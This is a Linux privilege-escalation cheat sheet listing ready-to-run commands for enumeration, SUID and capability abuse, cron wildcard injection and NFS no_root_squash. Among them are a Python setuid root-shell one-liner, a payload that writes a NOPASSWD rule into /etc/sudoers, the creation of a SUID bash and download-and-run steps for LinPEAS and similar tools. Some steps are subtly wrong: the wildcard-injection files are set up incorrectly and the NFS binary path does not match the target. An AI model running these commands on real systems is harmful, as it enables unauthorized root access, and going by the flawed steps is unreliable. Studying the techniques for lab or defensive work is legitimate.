🔍 Enumeration

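# System info
uname -a
cat /etc/os-release
hostname

# Current user
id
whoami

# Users with an interactive shell — grep reads the file directly (no cat pipe needed)
grep -E '/bin/(bash|sh)$' /etc/passwd
groups

# Sudo permissions — sudo -l lists the rules that apply to the current user;
# /etc/sudoers is normally root-owned mode 0440, so the cat only succeeds when
# already privileged
sudo -l
cat /etc/sudoers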

🎯 SUID/SGID Vectors

# Find SUID binaries — the two find forms below are equivalent (-4000 and -u=s
# both mean "set-user-id bit set"); note only SUID is searched here, not SGID
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

# GTFOBins (gtfobins.github.io)
# Nmap
# Interactive mode no longer exists in modern Nmap releases; "!sh" is typed at
# the nmap> prompt of an old build, it is not a shell command on its own
nmap --interactive
!sh

# Find capability
getcap -r / 2>/dev/null

# Python with capability
# Only meaningful when the getcap output above shows cap_setuid on this exact
# python3 binary; without it os.setuid(0) fails with PermissionError
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

🛠️ Automated Tools

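# LinPEAS — save the script first so it can be read before it runs; -f makes
# curl fail on an HTTP error instead of piping an error page into the shell
curl -fsSL -o linpeas.sh https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh

# LinEnum (a bash script, so run it with bash rather than sh)
curl -fsSL -o LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
bash LinEnum.sh

# linux-exploit-suggester (also a bash script)
curl -fsSL -o linux-exploit-suggester.sh https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
bash linux-exploit-suggester.sh

# pspy (process monitoring) — a prebuilt binary; check the download against the
# release's published hash before making it executable
wget https://github.com/DominicBreuker/pspy/releases/latest/download/pspy64
chmod +x pspy64 && ./pspy64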

⏰ Cron Jobs

# Find cron jobs
cat /etc/crontab
ls -la /etc/cron.d/
ls -la /var/spool/cron/

# Writeable scripts in cron (only /etc/cron.d is checked here)
find /etc/cron.d -writable 2>/dev/null

# Wildcard injection
# If a cron script runs tar over an unquoted *, file names in that directory
# are expanded into its argument list and can be taken as options.
# Mitigation: quote paths or use ./* and -- in scripts run by cron, and keep
# the directories they operate on non-writable by unprivileged users.
touch /etc/update.conf
echo 'echo "user ALL=(root) NOPASSWD:ALL" >> /etc/sudoers' > --checkpoint-action=exploit.sh

📁 NFS Root Squashing

# Check NFS exports (on the target; the option of interest is no_root_squash)
cat /etc/exports

# If no_root_squash, mount and create SUID
# The next three commands run as root on the NFS client, not on the target;
# with no_root_squash the server preserves the copied file's root ownership.
# Mitigation: keep root_squash (the default) and export to named hosts only,
# never to *.
mount -t nfs target:/ /tmp/nfs
cp bash /tmp/nfs/setuid
chmod +s /tmp/nfs/setuid

# On target, run the binary
/tmp/nfs/setuid